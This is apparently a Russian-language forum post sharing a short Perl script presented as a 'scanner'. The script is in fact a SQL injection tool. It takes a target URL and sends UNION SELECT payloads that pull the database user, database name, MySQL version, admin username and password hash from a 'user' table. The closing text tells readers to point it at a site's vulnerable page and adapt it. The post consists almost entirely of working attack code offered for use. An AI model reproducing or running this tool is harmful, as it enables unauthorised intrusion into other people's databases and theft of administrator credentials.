скрипт небольшого сканера на Perl

[lukeone]

#!/usr/bin/perl

use LWP::Simple;                                    #Подключаю LWP
print "Enter Name Site:";                        #Вывод сообщения о просьбе ввести адрес сайта
$site = <STDIN>;                                   #Ввод с клавиатуры
print "Enter Columns:";                     #Вывод сообщения о просьбе ввести номер столбца
$number = <STDIN>;                                   #Ввод с клавиатуры
$Column = "'+union+select+$number/*";                #Запрос sql для выполнения к $number будет присвоено значение которое мы введем с клавиатуры
$usermysql = "'+union+select+user()/*";              #Запрос sql для выполнения и получения имени пользователя БД
$database = "'+union+select+database()/*";           #Запрос sql для выполнения и получения имени БД
$version = "'+union+select+version()/*";             #Запрос sql для выполнения и получения версии мускула
$username = "'+union+select+username+from+user/*";   #Запрос sql для выполнения и получении имени из таблици "user"
$password = "'+union+select+password+from+user/*";   #Запрос sql для выполнения и получении пароля из таблици "user"

#Начинаем выполнять запросы

$Column = get "$site $Column";                  #К переменой $site будет присвоено имя сайта которое мы введем, а $column запрос который мы присвоили переменой
$usermysql = get "$site $usermysql";              #То же самое тока на этот раз с выполняем другой запрос, дальше в том же духе
$database = get "$site $database";
$version = get "$site $version";
$username = get "$site $username";
$password = get "$site $password";

#Выводим данные на экран

if($Column) {                                        #Используем оператор if
               print "Columns : $Column\n";          #Если столбец подобран вывод на экран
} else {                                             #А если нет то
              print "Columns not Select\n";          #Вывод сообщения о том что столбец не подобран
}                                                    #Закрываем работу оператора
print "Usermysql name : $usermysql\n";                #Вывод имени пользователя БД
print "Databases name : $database\n";                  #Вывод имени БД
print "Mysql Version : $version\n";                  #Вывод версии мускула
print "Admin : $username\n";                         #Вывод имени администратора
print "Hash : $password\n";                          #Вывод хеша администратора

это простенький пример кода на perl, вы можете сами его модифицировать, суть его работы в том, что при запуске скрипта, вы вставляете сначала ссылку на уязвимое место сайта, к примеру Для просмотра ссылки Войди или Зарегистрируйся , и выбираете номер колонки, которая вам нужна, к примеру 2, и он вам выводит все данные со второй колонки)